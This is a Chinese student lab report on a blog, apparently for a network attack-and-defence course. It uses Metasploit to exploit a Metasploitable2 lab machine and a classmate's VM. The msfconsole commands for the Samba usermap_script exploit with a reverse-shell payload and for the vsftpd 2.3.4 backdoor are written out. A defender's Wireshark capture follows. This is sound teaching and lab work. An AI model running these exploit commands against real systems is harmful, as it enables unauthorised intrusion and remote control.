20231913 2023-2024-2 《网络攻防实践》实践七报告

最新推荐文章于 2024-09-11 12:03:35 发布
最新推荐文章于 2024-09-11 12:03:35 发布
阅读量415 收藏 7
点赞数 5
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cangdao2001/article/details/138472741
版权

20231913 2023-2024-2 《网络攻防实践》实践七报告

1.实践过程

1.1 使用Metasploit进行Linux远程渗透攻击

输入msfconsole启动msfconsole
在这里插入图片描述
输入search usermap_script
在这里插入图片描述
输入use exploit/multi/samba/usermap_script
然后输入show payloads显示此漏洞的载荷
在这里插入图片描述
输入set payload cmd/unix/reverse
输入 set LHOST 192.168.236.251 (kali) 和 set RHOST 192.168.236.241(Metasploitable2_Linux)
在这里插入图片描述
渗透成功
在这里插入图片描述

1.2 实践作业:攻防对抗实践

(1)进攻
我的kali作为攻击机 ip192.168.236.251(20231913ZC)
YZY的metasploitable2-linux作为靶机 ip192.168.236.1(20231914TYZY)
ip地址如下
在这里插入图片描述

在这里插入图片描述
可以ping通
在这里插入图片描述
输入命令msfconsole启动,并输入search vsftp查找vsftp漏洞
在这里插入图片描述

在这里插入图片描述
输入
use exploit/unix/ftp/vsftpd_234_backdoor
show payloads
set payloads payload/cmd/unix/interact
set RHOST 192.168.236.1
set LHOST 192.168.1236.251

在这里插入图片描述
输入exploit,发现成功渗透,获得防守方靶机控制权
在这里插入图片描述
(2)防守
我作为防守方 防守机metasploitable2-linux ip192.168.236.241(20231913ZC)
攻击机kali ip192.168.236.20(20231914YZY)
可以ping通
靶机ip地址如下
在这里插入图片描述
YZY同学重复之前的步骤渗透我的靶机,我在wireshark中抓到了该数据包如下
在这里插入图片描述

在这里插入图片描述

2.学习中遇到的问题及解决

  • 问题1:我在防守的时候一直ping不通
  • 问题1解决方案:原来是插着网线,没有和YZY的电脑连接在一个网段下

3.实践总结

本次实践的内容不多,和上一次实践过程比较相似,我下载了一个新的虚拟机metasploitable2-linux,了解了Linux的远程渗透攻击。

参考资料

cangdao2001
关注
20231913 2023-2024-2 《网络攻防实践实践报告
cangdao2001的博客
05-23 1009
xxx xxx。
20231913 2023-2024-2 《网络攻防实践实践报告
cangdao2001的博客
04-25 696
通过本次实验,进行了Windows操作系统安全攻防实践,动手实践Metasploit windows attacker,对解码一次成功的NT系统破解攻击进行了取证分析实践,最后进行了团队对抗实践,对windows系统远程渗透攻击和分析。通过进行实践,加深了我对于windows系统安全的理解。但同时由于自身能力原因还有部分实践要求可能没有达成,希望在以后的实践中可以做的更好。
20231913 2023-2024-2 《网络攻防实践实践报告
cangdao2001的博客
04-18 758
通过本次实验,我对网络安全防范技术和网络检测技术有了更为具体的认识,加深了对防火墙、入侵检测系统功能的理解,学会分析虚拟网络攻防环境中蜜网网关的防火墙和IDS/IPS配置规则。但在实验过程中我还是对虚拟机的诸多指令不了解,不熟练,所以还需要多加学习。
20231913 2023-2024-2 《网络攻防实践实践报告
cangdao2001的博客
05-09 420
本次实践内容非常多,步骤也比较繁杂,通过跟随视频的指导,我成功地进行了恶意代码文件类型的识别,掌握了脱壳技术和字符串提取方法。通过实验动手实践了分析案例 Crackme 程序,通过寻找其启动方式和内部信息,我加深了对一些网络攻防知识的理解。这些环节不仅锻炼了我的动手能力,还让我感受到了网络分析实践带来的乐趣。
20231913 2023-2024-2 《网络攻防实践》实验三
cangdao2001的博客
03-28 490
查询本机ip地址在kali上访问http://www.besti.edu.cn/ ,输入命令sudo tcpdump -n src 192.168.200.11 and tcp port 80,可以看到学校web的ip地址为203.208.50.98,端口号为80。
20231913 2023-2024-2 《网络攻防实践实践报告
cangdao2001的博客
04-04 962
本次实验我对ARP欺骗攻击、ICMP重定向攻击、SYN FLOOD攻击、TCP RST攻击以及TCP会话劫持攻击等网络攻击方式有了深入的了解与掌握,丰富了网络攻防的技能。但我在操作虚拟机中还是有非常多不熟练的地方,还需要不断努力不断提高。
20232820 2023-2024-2 《网络攻防实践实践报告
cylwyf的博客
04-26 1041
经由本次实验,知晓了一些有关linux安全攻防及部分漏洞的知识。借由对其他主机展开攻击,并夺取控制权的过程,深化了对所学知识的领会,且通过实践操作和查阅资料,提升了动手与实践的能力。然而,同时也存在诸多不足之处,仍需继续学习。
20231913 2023-2024-2 《网络攻防实践实践报告
cangdao2001的博客
05-16 288
在本次实验中我对缓冲区溢出的原理有了非常直观的认识,以及对其的攻击方式我进行了实操掌握,对vim编辑更加熟练,了解了gbd、execstack等工具的运用。更重要的是,在实验过程中我遇到很多问题,比如安装不了工具、某一步一直提示错误等等,我都经过不懈努力解决了问题,虽然消耗了很多时间,但在成功之后会觉得很有意义。
20232803 2023-2024-2 《网络攻防实践实践报告
weixin_46701653的博客
05-02 1089
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。在攻击前,打开Kali的Wireshark进行抓包,攻击完成后,在Wireshark中输入。
20221915 2022-2023-2 《网络攻防实践实践报告
Chris's blog
04-12 373
20221915 2022-2023-2 《网络攻防实践实践报告
20222928 2022-2023-2 《网络攻防实践实践报告
qq_43791615的博客
03-29 912
20222928 2022-2023-2 《网络攻防实践实践报告
20221915 2022-2023-2 《网络攻防实践实践报告
Chris's blog
05-14 200
本次实践让我学习SQL注入和XSS攻击的方法,了解其中的攻击原理。
20221902 2022-2023-2 《网络攻防实践》第一次作业
xiannvyeye的博客
03-03 657
网络攻防环境搭建
20221909 2022-2023-2 《网络攻防实践》第1周作业
zxr287的博客
03-02 380
实践
如何在DPDK中实现协议解析?
Do my best!
09-10 662
在 DPDK 中实现协议解析涉及几个步骤,包括初始化环境、配置网卡、接收数据包、解析数据包并处理数据包。下面将详细介绍这些步骤以及如何在 DPDK 中实现基本的协议解析。
​数据链路层——流量控制&可靠传输机制 ​
qq_25467441的博客
09-09 764
例题:一个信道的数据传输率为4kb/s ,单向传播时延为30ms ,如果使停止-等待协议的信道最大利用率达到80%,要求的数据帧长度至少为。设数据帧的长度为L比特,则发送方发送全部的数据需要时间:L/4。“停止-等待”就是每发送完一个分组就停止发送,等待对方确认,在收到确认后再发送下一个分组。因为是在讨论可靠传输的原理,所以并不考虑数据是在哪一个层次上传送的。发送方在一个发送周期内,有效地发送数据所需要的时间占整个发送周期的比率。数据链路层的流量控制是点对点的,而传输层的流量控制是端到端的。
WireShark分析localhost包
最新发布
ngczx的博客
09-11 655
WireShark分析localhost包
145-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务
DamnVanish的博客
09-07 898
Linux中最强权限维持rootkit
网络攻防实践:搜索引擎扫描与漏洞检测
"网络攻防实践之搜索引擎扫描器攻击.pdf" 在网络攻防实践中,搜索引擎扫描器扮演了重要的角色。搜索引擎,尤其是Google,由于其多语言支持、高速度和高精度的搜索结果,常被用于发现潜在的安全问题。扫描器则主要...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值